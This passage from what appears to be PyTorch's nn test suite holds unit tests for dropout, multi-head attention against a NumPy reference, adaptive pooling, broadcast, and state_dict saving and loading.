self.assertTrue(a.norm(p=opts["norm_type"], dim=1).le(opts["max_norm"]).all())
def test_AlphaDropout(self):
# generate random tensor with zero mean and unit std
input = torch.randn(5000)
self._test_alpha_dropout(nn.AlphaDropout, input)
def test_FeatureAlphaDropout(self):
b = random.randint(1, 5)
w = random.randint(1, 5)
h = random.randint(1, 5)
d = random.randint(1, 2)
num_features = 1000
input = torch.randn(num_features, b, d, w, h)
self._test_alpha_dropout(nn.FeatureAlphaDropout, input)
# no batch dims
input = torch.randn(50, 20, 64, 64)
self._test_alpha_dropout(nn.FeatureAlphaDropout, input)
def test_pad_scalar_error(self):
inputs = torch.tensor(0., requires_grad=True)
self.assertRaises(AssertionError, lambda: F.pad(inputs, (1, 1)))
self.assertRaises(AssertionError, lambda: F.pad(inputs, (1,)))
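# Cross-checks nn.MultiheadAttention / F.multi_head_attention_forward against a
# pure NumPy reference built from the helper functions defined inside the test.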
@unittest.skipIf(not TEST_NUMPY, "numpy not found")
def test_multihead_attention(self):
def _scaled_dot_attn_ref(Q, K, V, dims, unseen_mask=None, key_padding_mask=None):
""" Numpy-based reference implementation of scaled dot attention
for testing"""
QKT = _batchmatmul(
Q,
np.transpose(K, axes=[0, 1, 3, 2])
/ np.sqrt(dims[3], dtype=np.float32), # divide by sqrt(d_head)
)
b1, b2, s1, s2 = QKT.shape
if unseen_mask is not None or key_padding_mask is not None:
# assert s1 == s2
for i in range(b1):
for j in range(b2):
for m in range(s1):
for n in range(s2):
if unseen_mask is not None and unseen_mask[m][n] == 0:
QKT[i, j, m, n] = -np.inf
if key_padding_mask is not None and key_padding_mask[i][n]:
QKT[i, j, m, n] = -np.inf
reference = _softmax(QKT)
ref_attn_weight = reference
ref_attn_weight = np.sum(ref_attn_weight, axis=1) / b2
reference = _batchmatmul(reference, V)
return reference, ref_attn_weight
def _batchmatmul(a, b): # batchmatmul over 4 dim matrix
""" Numpy-based batch matrix multiply over 4 dim matrix"""
assert a.shape[0] == b.shape[0]
assert a.shape[1] == b.shape[1]
retval = np.zeros(
(a.shape[0], a.shape[1], a.shape[2], b.shape[3]), dtype=np.float32
)
for i in range(a.shape[0]):
for j in range(a.shape[1]):
retval[i, j, :, :] = np.matmul(a[i, j, :, :], b[i, j, :, :])
return retval
def _softmax(x): # softmax over 4 dim matrix
""" Numpy-based reference softmax over 4 dim matrix"""
np.seterr(invalid='ignore')
output = np.zeros(x.shape, dtype=np.float64)
for i in range(x.shape[0]):
for j in range(x.shape[1]):
for k in range(x.shape[2]):
x_curr = x[i, j, k, :]
e_x = np.exp(x_curr - np.amax(x_curr))
output[i, j, k, :] = e_x / np.sum(e_x)
return output
def _split_heads_ref(X, dims, nheads, d_head):
X_split = np.reshape(X, dims[:2] + [nheads, d_head])
X_split_transposed = np.transpose(X_split, [0, 2, 1, 3])
reference = np.reshape(X_split_transposed, [dims[0], nheads, dims[1], d_head])
return reference
def _combine_heads_ref(X, dims, nheads, d_head):
X_transposed = np.transpose(X, [0, 2, 1, 3])
reference = np.reshape(X_transposed, dims[:2] + [nheads * d_head])
return reference
def _fc(X, X_weight, X_bias):
X_fc_b = X_bias.detach().numpy()
X_fc_w = X_weight.detach().numpy()
return np.matmul(X, np.transpose(X_fc_w)) + X_fc_b
def _create_src_lengths_mask(batch_size, src_lengths):
"""
Generate boolean mask to prevent attention beyond the end of source
Inputs:
batch_size : int
src_lengths : [batch_size] of sentence lengths
Outputs:
[batch_size, max_src_len]
"""
max_srclen = src_lengths.max()
src_indices = torch.arange(0, max_srclen).unsqueeze(0).to(src_lengths)
src_indices = src_indices.expand(batch_size, max_srclen)
src_lengths = src_lengths.unsqueeze(dim=1).expand(batch_size, max_srclen)
# returns [batch_size, max_src_len]
return (src_indices < src_lengths).int().detach()
def _multihead_attn_test_helper(add_key_padding_mask=False, add_bias_kv=False, add_zero_attn=False,
saved_kv=False, same_embed_dim=False, byte_mask=False):
for _ in range(100):
batch_sz, seq_len = [random.randint(2, 10) for r in range(2)]
d_head = random.randint(3, 10)
nheads = random.randint(3, 10)
d_model = d_head * nheads
if same_embed_dim:
kv_dim = d_model
else:
kv_dim = random.randint(5, 20)
dims = [batch_sz, seq_len, kv_dim]
saved_k = None
saved_k_tensor = None
saved_v = None
saved_v_tensor = None
if saved_kv:
saved_k = np.random.rand(batch_sz * nheads, seq_len, d_head)
saved_k_tensor = torch.from_numpy(saved_k).to(torch.get_default_dtype())
saved_v = np.random.rand(batch_sz * nheads, seq_len, d_head)
saved_v_tensor = torch.from_numpy(saved_v).to(torch.get_default_dtype())
key_padding_mask = None
key_padding_mask_tensor = None
if add_key_padding_mask:
seq_mask = np.random.randint(0, 2, (1, seq_len))
key_padding_mask = (np.repeat(seq_mask, batch_sz, axis=0) == 1)
key_padding_mask_tensor = torch.from_numpy(key_padding_mask)
if byte_mask:
key_padding_mask_tensor = key_padding_mask_tensor.byte()
decoder_state = np.random.rand(batch_sz, d_model)
K = np.random.rand(*dims)
V = K
Q = np.expand_dims(decoder_state, 1)
attn_mask = np.random.randint(0, 2, size=(1, seq_len))
attn_mask_tensor = torch.from_numpy(attn_mask).float()
if byte_mask:
attn_mask_tensor = (attn_mask_tensor == 0).byte()
else:
attn_mask_tensor.masked_fill_(attn_mask_tensor == 0, float('-inf'))
attn_mask_tensor.masked_fill_(attn_mask_tensor > 0, float('0.0'))
attn_mask_tensor = attn_mask_tensor.double()
decoder_state_tensor = torch.from_numpy(decoder_state).to(torch.get_default_dtype())
source_hid_tensor = torch.from_numpy(K).to(torch.get_default_dtype()).transpose(0, 1)
multihead_attn_module = MultiheadAttention(d_model, nheads,
add_bias_kv=add_bias_kv,
add_zero_attn=add_zero_attn,
kdim=kv_dim, vdim=kv_dim)
if add_bias_kv:
bias_k = multihead_attn_module.bias_k.detach().numpy()
bias_v = multihead_attn_module.bias_v.detach().numpy()
else:
bias_k = None
bias_v = None
_Q = decoder_state_tensor.unsqueeze(1).transpose(0, 1)
_V = source_hid_tensor
_K = source_hid_tensor
if multihead_attn_module._qkv_same_embed_dim:
result, result_weight = torch.nn.functional.multi_head_attention_forward(
_Q, _K, _V,
d_model, nheads,
multihead_attn_module.in_proj_weight, multihead_attn_module.in_proj_bias,
multihead_attn_module.bias_k, multihead_attn_module.bias_v,
multihead_attn_module.add_zero_attn, multihead_attn_module.dropout,
multihead_attn_module.out_proj.weight, multihead_attn_module.out_proj.bias,
multihead_attn_module.training, key_padding_mask_tensor, True, attn_mask_tensor,
static_k=saved_k_tensor, static_v=saved_v_tensor)
else:
result, result_weight = torch.nn.functional.multi_head_attention_forward(
_Q, _K, _V,
d_model, nheads,
None, multihead_attn_module.in_proj_bias,
multihead_attn_module.bias_k, multihead_attn_module.bias_v,
multihead_attn_module.add_zero_attn, multihead_attn_module.dropout,
multihead_attn_module.out_proj.weight, multihead_attn_module.out_proj.bias,
multihead_attn_module.training, key_padding_mask_tensor, True, attn_mask_tensor,
True, multihead_attn_module.q_proj_weight,
multihead_attn_module.k_proj_weight, multihead_attn_module.v_proj_weight,
static_k=saved_k_tensor, static_v=saved_v_tensor)
result = result.squeeze(0).detach().numpy()
if multihead_attn_module._qkv_same_embed_dim:
q_proj_weight = multihead_attn_module.in_proj_weight[:d_model]
k_proj_weight = multihead_attn_module.in_proj_weight[d_model:(d_model * 2)]
v_proj_weight = multihead_attn_module.in_proj_weight[(d_model * 2):]
else:
q_proj_weight = multihead_attn_module.q_proj_weight
k_proj_weight = multihead_attn_module.k_proj_weight
v_proj_weight = multihead_attn_module.v_proj_weight
Q_fc = _fc(Q, q_proj_weight, multihead_attn_module.in_proj_bias[:d_model])
K_fc = _fc(K, k_proj_weight, multihead_attn_module.in_proj_bias[d_model:(d_model * 2)])
V_fc = _fc(V, v_proj_weight, multihead_attn_module.in_proj_bias[(d_model * 2):])
if add_bias_kv:
K_fc = np.concatenate((K_fc, np.repeat(bias_k, K_fc.shape[0], axis=0)), axis=1)
V_fc = np.concatenate((V_fc, np.repeat(bias_v, V_fc.shape[0], axis=0)), axis=1)
if attn_mask is not None:
attn_mask = np.concatenate((attn_mask, np.ones([1, 1])), axis=1)
if key_padding_mask is not None:
key_padding_mask = np.concatenate((key_padding_mask, np.full((batch_sz, 1), False, dtype=bool)), axis=1)
dims[1] += 1
Q_split = _split_heads_ref(
Q_fc, [batch_sz, 1, d_model], nheads, d_head
)
if saved_k is not None:
K_split = np.reshape(saved_k, [dims[0], nheads, dims[1], d_head])
else:
K_split = _split_heads_ref(K_fc, dims, nheads, d_head)
if saved_v is not None:
V_split = np.reshape(saved_v, [dims[0], nheads, dims[1], d_head])
else:
V_split = _split_heads_ref(V_fc, dims, nheads, d_head)
if add_zero_attn:
dims[1] += 1
K_split = np.concatenate((K_split, np.zeros([K_split.shape[0], K_split.shape[1], 1, K_split.shape[3]])), axis=2)
V_split = np.concatenate((V_split, np.zeros([V_split.shape[0], V_split.shape[1], 1, V_split.shape[3]])), axis=2)
if attn_mask is not None:
attn_mask = np.concatenate((attn_mask, np.ones([1, 1])), axis=1)
if key_padding_mask is not None:
key_padding_mask = np.concatenate((key_padding_mask, np.full((batch_sz, 1), False, dtype=bool)), axis=1)
attn_heads, ref_attn_weight = _scaled_dot_attn_ref(
Q=Q_split,
K=K_split,
V=V_split,
dims=Q_split.shape,
unseen_mask=attn_mask,
key_padding_mask=key_padding_mask
)
combined_attn_heads = _combine_heads_ref(
X=attn_heads, dims=[batch_sz, 1], nheads=nheads, d_head=d_head
)
reference = _fc(combined_attn_heads, multihead_attn_module.out_proj.weight, multihead_attn_module.out_proj.bias)
reference = np.squeeze(reference, axis=1)
# result = reference
self.assertEqual(tuple(result.shape), (batch_sz, d_model))
np.testing.assert_allclose(result, reference, atol=1e-5)
# result_weight = ref_attn_weight
result_weight = result_weight.detach().numpy()
self.assertEqual(tuple(result_weight.shape), tuple(ref_attn_weight.shape))
np.testing.assert_allclose(result_weight, ref_attn_weight, atol=1e-5)
def test_multihead_attn_add_bias_kv():
_multihead_attn_test_helper(add_bias_kv=True)
def test_multihead_attn_add_zero_attn():
_multihead_attn_test_helper(add_zero_attn=True)
def test_multihead_attn_no_masking():
_multihead_attn_test_helper()
def test_multihead_attn_key_padding_mask():
_multihead_attn_test_helper(add_key_padding_mask=True)
def test_multihead_attn_saved_kv():
_multihead_attn_test_helper(saved_kv=True)
def test_multihead_attn_add_bias_kv_zero_attn():
_multihead_attn_test_helper(add_key_padding_mask=True, add_bias_kv=True,
add_zero_attn=True)
def test_multihead_attn_all_arguments1():
_multihead_attn_test_helper(add_key_padding_mask=True, add_zero_attn=True, saved_kv=True)
def test_multihead_attn_all_arguments2():
_multihead_attn_test_helper(add_key_padding_mask=True, add_bias_kv=True,
add_zero_attn=True, saved_kv=True)
def test_multihead_attn_all_arguments3():
_multihead_attn_test_helper(add_key_padding_mask=True, add_zero_attn=True,
saved_kv=True, same_embed_dim=True)
def test_multihead_attn_all_arguments4():
_multihead_attn_test_helper(add_key_padding_mask=True, add_zero_attn=True,
saved_kv=True, same_embed_dim=True, byte_mask=True)
test_multihead_attn_add_zero_attn() # Test MultiheadAttention with add_zero_attn
test_multihead_attn_add_bias_kv() # Test MultiheadAttention with add_bias_kv
test_multihead_attn_no_masking() # Test MultiheadAttention without masking
test_multihead_attn_key_padding_mask() # Test MultiheadAttention with src lengths
test_multihead_attn_saved_kv() # Test MultiheadAttention with static kv.
test_multihead_attn_add_bias_kv_zero_attn() # Test MultiheadAttention with bias_kv and zero_attn.
test_multihead_attn_all_arguments1() # Test MultiheadAttention with all the arguments.
with self.assertRaisesRegex(AssertionError, "bias cannot be added to static key."):
test_multihead_attn_all_arguments2() # Test MultiheadAttention with all the arguments.
test_multihead_attn_all_arguments3() # Test MultiheadAttention with all the arguments.
test_multihead_attn_all_arguments4() # Test MultiheadAttention with all the arguments.
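# A 3D attn_mask has shape (N * num_heads, T, S); expanding per-sample 2D masks
# with repeat_interleave must produce the same outputs as per-sample calls.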
def test_multihead_attn_3d_attn_mask(self):
embed_dim = 8
num_heads = 4
batch_size = 8
src_len = 3
tgt_len = 2
query = torch.rand(batch_size, tgt_len, embed_dim) # [N, T, D]
key = torch.rand(batch_size, src_len, embed_dim) # [N, S, D]
value = key # [N, S, D]
attn_mask = torch.randint(0, 2, (batch_size, tgt_len, src_len)).float() # [N, T, S]
attn_mask = attn_mask.masked_fill(attn_mask == 0, float('-inf')).masked_fill(attn_mask == 1, float(0.0))
mta_model = torch.nn.MultiheadAttention(embed_dim, num_heads)
# Generate 3D results
attn_mask_3d = torch.repeat_interleave(attn_mask, num_heads, dim=0) # [N * H, T, S]
output_3d = mta_model(query.transpose(0, 1), key.transpose(0, 1), value.transpose(0, 1), attn_mask=attn_mask_3d)[0]
output_3d = output_3d.transpose(0, 1) # [N, T, D]
for i in range(0, batch_size):
output_2d = mta_model(query[i].unsqueeze(0).transpose(0, 1),
key[i].unsqueeze(0).transpose(0, 1),
value[i].unsqueeze(0).transpose(0, 1),
attn_mask=attn_mask[i])[0]
# output_2d in shape of [T, 1, D]
self.assertEqual(output_3d[i].unsqueeze(0).transpose(0, 1), output_2d)
def test_multihead_attn_no_bias(self):
embed_dim = 8
num_heads = 4
mha = torch.nn.MultiheadAttention(embed_dim, num_heads, bias=False)
# Verify that bias=False applies to both in and out projection layers.
self.assertIsNone(mha.in_proj_bias)
self.assertIsNone(mha.out_proj.bias)
def test_normalize(self):
inputs = torch.randn(1, 3, 4, 4, requires_grad=True)
self.assertTrue(gradcheck(lambda x: F.normalize(x, p=1, dim=-1), (inputs,)))
self.assertTrue(gradcheck(lambda x: F.normalize(x, p=2, dim=-2), (inputs,)))
inputs = torch.randn((), requires_grad=True)
self.assertTrue(gradcheck(lambda x: F.normalize(x, p=1, dim=-1), (inputs,)))
def test_adaptive_pooling_input_size(self):
for numel in (2, 3):
for pool_type in ('Max', 'Avg'):
cls_name = 'Adaptive{}Pool{}d'.format(pool_type, numel)
module_cls = getattr(nn, cls_name)
output_size = (2,) * numel
module = module_cls(output_size)
input = torch.randn(output_size)
self.assertRaises(ValueError, lambda: module(input))
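# An output_size entry of None means that dimension keeps the input's size.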
def test_adaptive_pooling_size_none(self):
for numel in (2, 3):
for pool_type in ('Max', 'Avg'):
cls_name = 'Adaptive{}Pool{}d'.format(pool_type, numel)
module_cls = getattr(nn, cls_name)
output_size = (2,) * (numel - 1) + (None,)
module = module_cls(output_size)
input = torch.randn((4,) * (numel + 1))
output = module(input)
self.assertEqual(output.size(), (4,) + (2,) * (numel - 1) + (4,))
@unittest.skipIf(TEST_WITH_UBSAN, "signed integer overflow error with UBSAN")
def test_adaptive_pooling_size_overflow(self):
# 0x3fffffffffffffff * 2 * 2 = 0xfffffffffffffffc = -4 as int64_t
# Tensor::numel() returns int64_t, so the following checks that negative allocs are correctly handled
self.assertRaises(
RuntimeError,
lambda: torch.nn.AdaptiveMaxPool1d(0x3fffffffffffffff)(torch.empty([2, 2, 2])))
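# channels_last (NHWC) pooling must match the contiguous (NCHW) reference in
# both forward outputs and input gradients, on CPU and, when available, CUDA.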
def test_adaptive_pooling_avg_nhwc(self):
device_list = ['cpu']
if TEST_CUDA:
device_list.append('cuda')
for device in device_list:
input = torch.randint(1, 10, (4, 8, 8, 8), dtype=torch.float32).to(device)
input = input.contiguous(memory_format=torch.channels_last).requires_grad_()
grad = torch.randint(1, 10, (4, 8, 7, 7), dtype=torch.float32).to(device)
pool = torch.nn.AdaptiveAvgPool2d((7, 7)).to(device)
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_pool = torch.nn.AdaptiveAvgPool2d((7, 7)).to(device)
out = pool(input)
out.backward(grad)
ref_out = ref_pool(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(input.grad, ref_input.grad)
def test_adaptive_pooling_avg_nhwc_non_contiguous(self):
device_list = ['cpu']
if TEST_CUDA:
device_list.append('cuda')
for device in device_list:
input = torch.randint(1, 10, (4, 8, 8, 8), dtype=torch.float32).to(device)
input = input.contiguous(memory_format=torch.channels_last)
input = input[:, ::2, :, :].requires_grad_()
grad = torch.randint(1, 10, (4, 8, 7, 7), dtype=torch.float32).to(device)
grad = grad[:, ::2, :, :]
pool = torch.nn.AdaptiveAvgPool2d((7, 7)).to(device)
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_pool = torch.nn.AdaptiveAvgPool2d((7, 7)).to(device)
out = pool(input)
out.backward(grad)
ref_out = ref_pool(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(input.grad, ref_input.grad)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@largeTensorTest('12GB', device='cuda')
def test_adaptive_pooling_avg_nhwc_launch_config_backward(self):
input = torch.randint(1, 10, (1, 32, 2 ** 17 + 1, 32), dtype=torch.float32, device="cuda")
input = input.contiguous(memory_format=torch.channels_last).requires_grad_()
grad = torch.randint(1, 10, (1, 32, 10, 32), dtype=torch.float32, device="cuda")
pool = torch.nn.AdaptiveAvgPool2d((10, 32)).cuda()
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_pool = torch.nn.AdaptiveAvgPool2d((10, 32)).cuda()
out = pool(input)
out.backward(grad)
ref_out = ref_pool(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(input.grad, ref_input.grad)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@largeTensorTest('12GB', device='cuda')
def test_adaptive_pooling_avg_nhwc_launch_config_forward(self):
input = torch.randint(1, 10, (1, 32, 16, 16), dtype=torch.float32, device="cuda")
input = input.contiguous(memory_format=torch.channels_last).requires_grad_()
pool = torch.nn.AdaptiveAvgPool2d((2 ** 17 + 1, 32)).cuda()
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_pool = torch.nn.AdaptiveAvgPool2d((2 ** 17 + 1, 32)).cuda()
out = pool(input)
ref_out = ref_pool(ref_input)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_broadcast_double_backwards_gpu(self):
tensors = (torch.randn(4, 4, device='cuda', requires_grad=True),
torch.randn(4, 4, device='cuda', requires_grad=True),
torch.randn(4, 4, device='cuda', requires_grad=True))
# TODO(#50743): the following segfaults with check_batched_grad=True
_assertGradAndGradgradChecks(self, lambda *i: Broadcast.apply((0, 1), *i), tensors,
check_batched_grad=False)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_broadcast_not_requiring_grad(self):
variables = [
torch.randn(1, 2, device='cuda', requires_grad=True),
torch.randn(1, 2, device='cuda', requires_grad=False),
torch.randn(1, 2, device='cuda', requires_grad=False),
torch.randn(1, 2, device='cuda', requires_grad=True),
torch.randn(1, 2, device='cuda', requires_grad=True),
]
broadcasted_variables = Broadcast.apply((0, 1), *variables)
for output_idx, broadcasted_var in enumerate(broadcasted_variables):
input_var = variables[output_idx % len(variables)]
self.assertEqual(input_var.requires_grad, broadcasted_var.requires_grad)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_broadcast_no_grad(self):
x = torch.randn(1, 2, dtype=torch.float32, requires_grad=True, device='cuda')
with torch.no_grad():
broadcasted = Broadcast.apply((0, 1), x)
self.assertTrue(x.requires_grad)
for output in broadcasted:
self.assertFalse(output.requires_grad)
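# state_dict flattens parameters and buffers under dotted names: a module
# assigned twice (linear1 and linear2 both point at `l`) is serialized under
# both prefixes, and `_metadata` holds one versioning entry per module.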
def test_state_dict(self):
l = nn.Linear(5, 5)
block = nn.Module()
block.conv = nn.Conv2d(3, 3, 3, bias=False)
net = nn.Module()
net.linear1 = l
net.linear2 = l
net.bn = nn.BatchNorm2d(2)
net.block = block
net.add_module('empty', None)
state_dict = net.state_dict()
self.assertEqual(len(state_dict), 10)
self.assertEqual(len(state_dict._metadata), 6)
self.assertIn('', state_dict._metadata)
self.assertIn('linear1', state_dict._metadata)
self.assertIn('linear1.weight', state_dict)
self.assertIn('linear1.bias', state_dict)
self.assertIn('linear2', state_dict._metadata)
self.assertIn('linear2.weight', state_dict)
self.assertIn('linear2.bias', state_dict)
self.assertIn('block', state_dict._metadata)
self.assertIn('block.conv', state_dict._metadata)
self.assertIn('block.conv.weight', state_dict)
self.assertNotIn('block.conv.bias', state_dict)
self.assertIn('bn', state_dict._metadata)
self.assertIn('bn.weight', state_dict)
self.assertIn('bn.bias', state_dict)
self.assertIn('bn.running_var', state_dict)
self.assertIn('bn.running_mean', state_dict)
self.assertIn('bn.num_batches_tracked', state_dict)
self.assertFalse(any(k.startswith('empty') for k in state_dict.keys()))
for k, v in state_dict.items():
param = net
for component in k.split('.'):
param = getattr(param, component)
if isinstance(param, Parameter):
param = param.data
self.assertEqual(v.data_ptr(), param.data_ptr())
l = nn.Linear(5, 5)
state_dict = l.state_dict()
self.assertEqual(len(state_dict), 2)
self.assertEqual(len(state_dict._metadata), 1)
self.assertIn('', state_dict._metadata)
self.assertTrue(state_dict._metadata['']['version'] >= 0)
self.assertEqual(state_dict['weight'].data_ptr(), l.weight.data_ptr())
self.assertEqual(state_dict['bias'].data_ptr(), l.bias.data_ptr())
def test_load_state_dict(self):
l = nn.Linear(5, 5)
block = nn.Module()
block.conv1 = nn.Conv2d(3, 3, 3, bias=True)
block.conv2 = nn.Conv2d(3, 3, 3, bias=False)
net = nn.Module()
net.linear1 = l
net.linear2 = l
net.bn = nn.BatchNorm2d(2)
net.block = block
net.add_module('empty', None)
conv1_bias_dtype = block.conv1.bias.dtype
state_dict = net.state_dict()
state_dict.update({
'linear1.weight': torch.ones(5, 5),
'block.conv1.bias': torch.arange(1, 4, dtype=conv1_bias_dtype),
'bn.running_mean': torch.randn(2),
})
# Also test if a DDP state_dict can be loaded from a local model.
ddp_state_dict = net.state_dict()
ddp_state_dict.update({
'module.linear1.weight': torch.ones(5, 5),
'module.block.conv1.bias': torch.arange(1, 4, dtype=conv1_bias_dtype),
'module.bn.running_mean': torch.randn(2),
})
torch.nn.modules.utils.consume_prefix_in_state_dict_if_present(ddp_state_dict, 'module.')
for sd in [state_dict, ddp_state_dict]:
incompatible_keys = net.load_state_dict(sd)
self.assertEqual(len(incompatible_keys.missing_keys), 0)
self.assertEqual(len(incompatible_keys.unexpected_keys), 0)
self.assertNotIn('Incompatible', str(incompatible_keys))
self.assertEqual(net.linear1.weight, sd['linear1.weight'])
self.assertEqual(net.block.conv1.bias, sd['block.conv1.bias'])
self.assertEqual(net.bn.running_mean, sd['bn.running_mean'])
state_dict = net.state_dict()
state_dict.update({'extra': torch.ones(5)})
self.assertRaises(RuntimeError, lambda: net.load_state_dict(state_dict))
incompatible_keys = net.load_state_dict(state_dict, strict=False)
self.assertEqual(len(incompatible_keys.missing_keys), 0)
self.assertEqual(len(incompatible_keys.unexpected_keys), 1)
self.assertIn('extra', incompatible_keys.unexpected_keys)
self.assertIn('Incompatible', str(incompatible_keys))
state_dict = net.state_dict()
state_dict.update({'extra.param': torch.ones(5)})
self.assertRaises(RuntimeError, lambda: net.load_state_dict(state_dict))
incompatible_keys = net.load_state_dict(state_dict, strict=False)
self.assertEqual(len(incompatible_keys.missing_keys), 0)
self.assertEqual(len(incompatible_keys.unexpected_keys), 1)
self.assertIn('extra.param', incompatible_keys.unexpected_keys)
state_dict = net.state_dict()
del state_dict['linear1.weight']
self.assertRaises(RuntimeError, lambda: net.load_state_dict(state_dict))
incompatible_keys = net.load_state_dict(state_dict, strict=False)
self.assertEqual(len(incompatible_keys.missing_keys), 1)
self.assertEqual(len(incompatible_keys.unexpected_keys), 0)
self.assertIn('linear1.weight', incompatible_keys.missing_keys)
state_dict.update({'extra.param': torch.ones(5)})
self.assertRaises(RuntimeError, lambda: net.load_state_dict(state_dict))
incompatible_keys = net.load_state_dict(state_dict, strict=False)
self.assertEqual(len(incompatible_keys.missing_keys), 1)
self.assertEqual(len(incompatible_keys.unexpected_keys), 1)
self.assertIn('linear1.weight', incompatible_keys.missing_keys)
self.assertIn('extra.param', incompatible_keys.unexpected_keys)
state_dict = net.state_dict()
state_dict.update({'bn.running_mean': torch.rand(14, 4)}) # wrong size
self.assertRaises(RuntimeError, lambda: net.load_state_dict(state_dict))
self.assertRaises(RuntimeError, lambda: net.load_state_dict(state_dict, strict=False))
state_dict = net.state_dict()
old_state_dict = deepcopy(state_dict)
state_dict = {
'linear1.weight': torch.ones(5, 5),
'block.conv1.bias': torch.arange(1, 4, dtype=conv1_bias_dtype),
'bn.running_mean': torch.randn(2),
'nonexistent_key': torch.rand(3)
}
net.load_state_dict(state_dict, strict=False)
self.assertEqual(net.linear1.weight, state_dict['linear1.weight'])
self.assertEqual(net.block.conv1.bias, state_dict['block.conv1.bias'])
self.assertEqual(net.bn.running_mean, state_dict['bn.running_mean'])
new_state_dict = net.state_dict()
del old_state_dict['linear1.weight']
del old_state_dict['block.conv1.bias']
del old_state_dict['bn.running_mean']
for k, v in old_state_dict.items():
self.assertTrue(v.equal(new_state_dict[k]))
def test_load_state_dict_BC(self):
# BatchNormNd
# Added num_batches_tracked buffer at version 2. For state dict with
# earlier versions or no versions, it should provide default value of 0.
bn = nn.BatchNorm2d(3)
state_dict = bn.state_dict()
del state_dict['num_batches_tracked']
state_dict._metadata['']['version'] = 1 # version 1
bn.load_state_dict(state_dict)
self.assertEqual(bn.num_batches_tracked.dtype, torch.long)
self.assertEqual(bn.num_batches_tracked.item(), 0)
del state_dict._metadata['']['version'] # no version
bn.load_state_dict(state_dict)
self.assertEqual(bn.num_batches_tracked.dtype, torch.long)
self.assertEqual(bn.num_batches_tracked.item(), 0)
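# A minimal sketch of the same BC pattern BatchNorm relies on above: a module
# reads the 'version' entry in local_metadata inside _load_from_state_dict and
# backfills a default for buffers that older checkpoints did not save. The
# module and buffer names here are ours, and the helper is not collected as a
# test (no test_ prefix).
def _versioned_load_sketch(self):
    class Counter(nn.Module):
        _version = 2

        def __init__(self):
            super(Counter, self).__init__()
            self.register_buffer('num_calls', torch.tensor(0, dtype=torch.long))

        def _load_from_state_dict(self, state_dict, prefix, local_metadata,
                                  strict, missing_keys, unexpected_keys,
                                  error_msgs):
            version = local_metadata.get('version', None)
            if version is None or version < 2:
                # pre-version-2 checkpoints lack 'num_calls'; supply the default
                # so strict loading does not report it as a missing key
                state_dict.setdefault(prefix + 'num_calls',
                                      torch.tensor(0, dtype=torch.long))
            super(Counter, self)._load_from_state_dict(
                state_dict, prefix, local_metadata, strict,
                missing_keys, unexpected_keys, error_msgs)

    m = Counter()
    sd = m.state_dict()
    del sd['num_calls']
    sd._metadata['']['version'] = 1  # simulate an old checkpoint
    m.load_state_dict(sd)
    self.assertEqual(m.num_calls.item(), 0)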
def test_load_state_dict_ref_cycle(self):
# load_state_dict shouldn't cause a reference cycle involving Tensors
import gc
m = torch.nn.LSTM(16, 16, bidirectional=True)
gc.collect()
m.load_state_dict(deepcopy(m).state_dict())
refcycles = gc.collect()
self.assertEqual(refcycles, 0)
def test_load_state_dict_custom(self):
class CustomState(nn.Module):
def __init__(self):
super(CustomState, self).__init__()
self.param = torch.nn.Parameter(torch.ones(1))
self.sub = torch.nn.Linear(5, 5)
def _save_to_state_dict(self, destination, prefix, keep_vars):
destination[prefix + "serialized"] = self.param.data + 1
def _load_from_state_dict(self, state_dict, prefix, local_metadata,
strict, missing_keys, unexpected_keys,
error_msgs):
# skip some of the error handling
self.param.data.copy_(state_dict[prefix + "serialized"] - 1)
# use sequential to verify nesting
m = nn.Sequential(CustomState())
with torch.no_grad():
m[0].param[0] = 10
m[0].sub.weight[0, 0] = 555
state_dict = m.state_dict()
self.assertEqual(state_dict["0.serialized"].item(), 11)
self.assertIn("0.sub.weight", state_dict)
self.assertNotIn("0.param", state_dict)
del m
mm = nn.Sequential(CustomState())
self.assertEqual(mm[0].param[0].item(), 1)
mm.load_state_dict(state_dict)
self.assertEqual(mm[0].param[0].item(), 10)
self.assertEqual(mm[0].sub.weight[0, 0].item(), 555)
def test_extra_state(self):
class SubModule(torch.nn.Module):
def __init__(self, foo):
super().__init__()
self.foo = foo
def get_extra_state(self):
return {
'foo': self.foo
}
def set_extra_state(self, state):
self.foo = state['foo']
class MyModule(torch.nn.Module):
def __init__(self, foo, bar):
super().__init__()
self.sub = SubModule(foo)
self.bar = bar
def get_extra_state(self):
return {
'bar': self.bar
}
def set_extra_state(self, state):
self.bar = state['bar']
# Ensure state_dict contains the extra state by loading it into another module.
m = MyModule(3, 'something')
m2 = MyModule(5, 'something else')
m2.load_state_dict(m.state_dict())
self.assertEqual(m.state_dict(), m2.state_dict())
self.assertEqual(m2.bar, m.bar)
self.assertEqual(m2.sub.foo, m.sub.foo)
def test_extra_state_non_dict(self):
class MyModule(torch.nn.Module):
def __init__(self, foo):
super().__init__()
self.foo = foo
def get_extra_state(self):
return self.foo
def set_extra_state(self, state):
self.foo = state
# Test various types of extra state.
for state in ('something', 5, MyModule(3)):
m = MyModule(state)
m2 = MyModule('something else')
m2.load_state_dict(m.state_dict())
self.assertEqual(m.state_dict(), m2.state_dict())
self.assertEqual(m.foo, m2.foo)
def test_extra_state_missing_set_extra_state(self):
class MyModule(torch.nn.Module):
